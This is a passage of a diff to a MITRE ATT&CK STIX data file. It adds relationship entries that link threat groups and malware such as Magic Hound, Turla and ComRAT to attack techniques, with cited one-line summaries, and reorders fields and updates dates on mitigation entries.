+ ],
+ "description": "(Citation: ClearSky Charming Kitten Dec 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--b49fa23f-285c-4a8d-81c6-995747e4a84b",
+ "type": "relationship",
+ "modified": "2020-07-04T22:20:47.110Z",
+ "created": "2020-07-04T22:20:47.110Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
+ }
+ ],
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) has used personalized spearphishing attachments.(Citation: Check Point Rocket Kitten)",
+ "relationship_type": "uses",
+ "id": "relationship--656f97ff-d577-4c1b-af7a-02497fcadddb",
+ "type": "relationship",
+ "modified": "2020-07-04T22:55:43.416Z",
+ "created": "2020-07-04T22:55:43.416Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
+ }
+ ],
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) used FireMalv, custom-developed malware, which collected passwords from the Firefox browser storage.(Citation: Check Point Rocket Kitten)",
+ "relationship_type": "uses",
+ "id": "relationship--6b901fc7-8aae-414b-96f2-2b626356cf38",
+ "type": "relationship",
+ "modified": "2020-07-04T22:55:43.422Z",
+ "created": "2020-07-04T22:55:43.422Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5",
+ "external_references": [
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
+ }
+ ],
+ "description": "(Citation: Check Point Rocket Kitten)",
+ "relationship_type": "uses",
+ "id": "relationship--44a71143-9a40-4307-8b8c-8b1ac0cf230d",
+ "type": "relationship",
+ "modified": "2020-07-04T22:55:43.581Z",
+ "created": "2020-07-04T22:55:43.581Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555",
+ "external_references": [
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
+ }
+ ],
+ "description": "(Citation: Check Point Rocket Kitten)",
+ "relationship_type": "uses",
+ "id": "relationship--de3436a3-b33f-4b47-a3c7-8204a67b4123",
+ "type": "relationship",
+ "modified": "2020-07-04T22:55:43.585Z",
+ "created": "2020-07-04T22:55:43.585Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "FireEye Operation Saffron Rose 2013",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf",
+ "description": "Villeneuve, N. et al.. (2013). OPERATION SAFFRON ROSE . Retrieved May 28, 2020."
+ }
+ ],
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) has lured victims into executing malicious files.(Citation: FireEye Operation Saffron Rose 2013)",
+ "relationship_type": "uses",
+ "id": "relationship--ef5ae5a4-69ed-4ca1-b1b7-6cb854b49550",
+ "type": "relationship",
+ "modified": "2020-07-04T23:30:04.875Z",
+ "created": "2020-07-04T23:30:04.875Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317",
+ "external_references": [
+ {
+ "source_name": "FireEye Operation Saffron Rose 2013",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf",
+ "description": "Villeneuve, N. et al.. (2013). OPERATION SAFFRON ROSE . Retrieved May 28, 2020."
+ },
+ {
+ "source_name": "SecureWorks Mia Ash July 2017",
+ "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.",
+ "url": "https://www.secureworks.com/research/the-curious-case-of-mia-ash"
+ },
+ {
+ "source_name": "Microsoft Phosphorus Mar 2019",
+ "url": "https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/",
+ "description": "Burt, T.. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) used various social media channels to spearphish victims.(Citation: FireEye Operation Saffron Rose 2013)(Citation: SecureWorks Mia Ash July 2017)(Citation: Microsoft Phosphorus Mar 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d432f9c7-1211-4485-bac3-b35edc38d501",
+ "type": "relationship",
+ "modified": "2020-07-04T23:30:04.892Z",
+ "created": "2020-07-04T23:30:04.892Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can install malicious browser extensions that are used to hijack user searches.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b7366815-256b-4e67-839a-1eb9aba03721",
+ "type": "relationship",
+ "modified": "2020-07-06T15:18:53.628Z",
+ "created": "2020-07-06T14:32:44.058Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has been programmed to sleep outside local business hours (9 to 5, Monday to Friday).(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--55465e2f-104a-440e-aa6b-24f1476fc86d",
+ "type": "relationship",
+ "modified": "2020-07-06T14:40:26.106Z",
+ "created": "2020-07-06T14:40:26.106Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has obtained information on security software, including security logging information that may indicate whether their malware has been detected.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ad8d3784-2eea-47b4-b13d-d16d0211acf3",
+ "type": "relationship",
+ "modified": "2020-07-06T14:49:46.322Z",
+ "created": "2020-07-06T14:49:46.322Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44",
+ "target_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4",
+ "relationship_type": "revoked-by",
+ "id": "relationship--c93632b4-0a7a-4492-a0e2-d57cffe7ff64",
+ "type": "relationship",
+ "modified": "2020-07-07T16:44:26.688Z",
+ "created": "2020-07-07T16:44:26.688Z"
+ },
{
"id": "course-of-action--4f170666-7edb-4489-85c2-9affa28a72e0",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -177129,8 +204965,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:02:53.251Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c61fee9f-16fb-4f8c-bbf0-869093fcd4a6",
@@ -177160,8 +204996,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:29:27.367Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c085476e-1964-4d7f-86e1-d8657a7741e8",
@@ -177216,8 +205052,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.252Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -177267,13 +205103,14 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:22.989Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_deprecated": true,
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.0",
+ "x_mitre_deprecated": true
},
{
- "id": "course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c",
- "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
- "name": "Account Use Policies",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -177281,10 +205118,9 @@
"url": "https://attack.mitre.org/mitigations/M1036"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Account Use Policies",
+ "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
+ "id": "course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c",
"type": "course-of-action",
"modified": "2019-06-13T16:07:21.233Z",
"created": "2019-06-11T16:32:21.854Z",
@@ -177306,7 +205142,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"type": "course-of-action",
- "modified": "2020-03-31T13:06:23.567Z",
+ "modified": "2020-05-29T16:34:40.344Z",
"created": "2019-06-06T16:39:58.291Z",
"x_mitre_version": "1.1"
},
@@ -177363,8 +205199,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.701Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--10571bf2-8073-4edf-a71c-23bad225532e",
@@ -177399,8 +205235,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.250Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1e4ef2c7-ee96-4484-9baa-3b5777561301",
@@ -177425,8 +205261,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:31:55.409Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c88151a5-fe3f-4773-8147-d801587065a4",
@@ -177446,8 +205282,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:05:33.227Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1",
@@ -177508,8 +205344,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:32:52.325Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--25d5e1d8-c6fb-4735-bc57-115a21222f4b",
@@ -177554,8 +205390,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.664Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--16dd03c6-0dfb-4d77-89cd-9ff3ee6e533d",
@@ -177600,8 +205436,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.317Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -177651,8 +205487,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:34:11.298Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -177697,8 +205533,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.017Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -177743,8 +205579,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.670Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--cb825b86-3f3b-4686-ba99-44878f5d3173",
@@ -177779,8 +205615,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:08:16.317Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ace4daee-f914-4707-be75-843f16da2edf",
@@ -177800,10 +205636,13 @@
"type": "course-of-action",
"modified": "2019-07-24T14:37:14.608Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2019-06-11T16:43:05.712Z",
+ "modified": "2019-06-11T16:43:05.712Z",
+ "type": "course-of-action",
"id": "course-of-action--90f39ee1-d5a3-4aaa-9f28-3b42815b0d46",
"description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
"name": "Behavior Prevention on Endpoint",
@@ -177818,9 +205657,6 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-11T16:43:05.712Z",
- "created": "2019-06-11T16:43:05.712Z",
"x_mitre_version": "1.0"
},
{
@@ -177866,8 +205702,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.322Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -177885,7 +205721,7 @@
"description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
"id": "course-of-action--7da0387c-ba92-4553-b291-b636ee42b2eb",
"type": "course-of-action",
- "modified": "2019-06-11T17:02:36.984Z",
+ "modified": "2020-05-19T12:28:50.603Z",
"created": "2019-06-11T17:02:36.984Z",
"x_mitre_version": "1.0"
},
@@ -177906,8 +205742,8 @@
"source_name": "TCG Trusted Platform Module"
},
{
- "url": "https://technet.microsoft.com/en-us/windows/dn168167.aspx",
- "description": "Microsoft. (n.d.). Secure the Windows 8.1 boot process. Retrieved June 11, 2016.",
+ "url": "https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process",
+ "description": "Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.",
"source_name": "TechNet Secure Boot Process"
}
],
@@ -177915,10 +205751,10 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"type": "course-of-action",
- "modified": "2019-07-24T14:10:43.001Z",
+ "modified": "2020-04-23T19:10:28.284Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1c0b39f9-a0c5-42b2-abd8-dc8f1eb74e67",
@@ -177963,8 +205799,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.672Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -177989,8 +205825,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:41:17.903Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--4a99fecc-680b-448e-8fe7-8144c60d272c",
@@ -178015,8 +205851,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:03:10.785Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.1"
},
{
"id": "course-of-action--beb45abb-11e8-4aef-9778-1f9ac249784f",
@@ -178041,8 +205877,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:13:23.637Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--91816292-3686-4a6e-83c4-4c08513b9b57",
@@ -178067,8 +205903,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:04:13.126Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d7c49196-b40e-42bc-8eed-b803113692ed",
@@ -178118,8 +205954,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.675Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--3e7018e9-7389-48e7-9208-0bdbcbba9483",
@@ -178144,8 +205980,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:05:00.492Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--19edfa02-1a5f-47e4-ad82-3288f57f64cf",
@@ -178190,13 +206026,17 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.314Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
- "id": "course-of-action--590777b3-b475-4c7c-aaf8-f4a73b140312",
- "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
- "name": "Code Signing",
+ "created": "2019-06-11T17:01:25.405Z",
+ "modified": "2020-05-20T13:12:02.881Z",
+ "type": "course-of-action",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -178204,14 +206044,10 @@
"url": "https://attack.mitre.org/mitigations/M1045"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-11T17:01:25.405Z",
- "created": "2019-06-11T17:01:25.405Z",
- "x_mitre_version": "1.0"
+ "name": "Code Signing",
+ "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+ "id": "course-of-action--590777b3-b475-4c7c-aaf8-f4a73b140312",
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -178246,8 +206082,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.319Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_deprecated": true,
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.0",
+ "x_mitre_deprecated": true
},
{
"object_marking_refs": [
@@ -178272,8 +206108,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:17:58.966Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--b8d57b16-d8e2-428c-a645-1083795b3445",
@@ -178303,8 +206139,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:09:33.072Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -178349,8 +206185,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.252Z",
"created": "2019-04-25T20:53:07.814Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--08e02f67-ea09-4f77-a70b-414963c29fc2",
@@ -178375,8 +206211,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:19:23.148Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--676975b9-7e8e-463d-a31e-4ed2ecbfed81",
@@ -178396,8 +206232,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:10:06.475Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ff5d862a-ae6b-4833-8c15-e235d654d28e",
@@ -178442,8 +206278,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.056Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--3a41b366-cfd6-4af2-a6e7-3c6e3c4ebcef",
@@ -178483,8 +206319,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.678Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9a5b7194-88e0-4579-b82f-e3c27b8cca80",
@@ -178504,8 +206340,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:11:24.572Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -178605,10 +206441,13 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.442Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2018-10-17T00:14:20.652Z",
+ "modified": "2019-07-24T18:12:19.081Z",
+ "type": "course-of-action",
"id": "course-of-action--0472af99-f25c-4abe-9fce-010fa3450e72",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Credentials in Files Mitigation",
@@ -178628,11 +206467,8 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "type": "course-of-action",
- "modified": "2019-07-24T18:12:19.081Z",
- "created": "2018-10-17T00:14:20.652Z",
- "x_mitre_deprecated": true,
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.0",
+ "x_mitre_deprecated": true
},
{
"id": "course-of-action--4490fee2-5c70-4db3-8db5-8d88767dbd55",
@@ -178652,8 +206488,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:22:57.902Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--f3d0c735-330f-43c2-8e8e-51bcfa51e8c3",
@@ -178678,8 +206514,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:13:22.017Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a569295c-a093-4db4-9fb4-7105edef85ad",
@@ -178704,8 +206540,8 @@
"type": "course-of-action",
"modified": "2019-07-24T18:14:14.227Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--b70627f7-3b43-4c6f-8fc0-c918c41f8f72",
@@ -178725,8 +206561,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:23:59.683Z",
"created": "2018-10-17T00:14:20.652Z",
